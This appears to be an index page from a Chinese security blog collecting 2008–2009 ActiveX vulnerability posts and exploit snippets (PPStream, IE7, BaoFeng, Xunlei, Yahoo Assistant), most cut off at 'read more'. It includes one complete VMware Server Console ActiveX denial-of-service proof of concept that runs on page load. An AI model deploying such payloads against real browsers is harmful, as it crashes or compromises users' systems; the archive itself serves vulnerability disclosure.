(1):
<!–
******************************************************************************
PPStream is the most huge p2p media player in the world.
There are two hundred million ppstream users in the world.
The vulnerability is exploitable,but I have no time to make it,you could visit my blog for detail.^@^
welcome to http://0dayexpose.blogspot.com/
COM Object – {D22DE742-04CD-4B5C-A8A3-82AB3DAEC43D} PPSMediaList Control
COM Object Filename : C:\PROGRA~1\PPStream\MList.ocx
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Company Name : PPStream Inc.
Version : V2.6.86.8900
Web Site : http://www.ppstream.com
*******************************************************************************
阅读全文 »
Tags: Activex,
PoC,
PPStream
milw0rm.com [2009-07-10]
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################
阅读全文 »
Tags: Activex,
Exploit,
IE7,
Microsoft
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
阅读全文 »
Tags: Activex,
Exploit,
暴风影音
来源:知道安全
发布日期:2008-7-18
最后更新日期:2008-7-18 15:57(GMT)
受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
阅读全文 »
Tags: Activex,
新浪,
漏洞
来源:http://hi.baidu.com/cloie/
今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞
EXP:
<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
阅读全文 »
Tags: Activex,
Exploit,
Office
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
迅雷是一款在中国非常流行的基于P2SP技术的下载软件。更多详细信息请参考:
http://www.xunlei.com
在迅雷5的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。
阅读全文 »
Tags: Activex,
迅雷
<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) {
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
<body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
</body>
</html>
# milw0rm.com [2008-05-28]
Tags: Activex,
PoC,
VMware
来源:
发现者: Sowhat of Nevis Labs
日期: 2008.05.06
http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt
CVE: N/A
厂商
Yahoo! CN
受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
阅读全文 »
Tags: Activex,
Yahoo!,
漏洞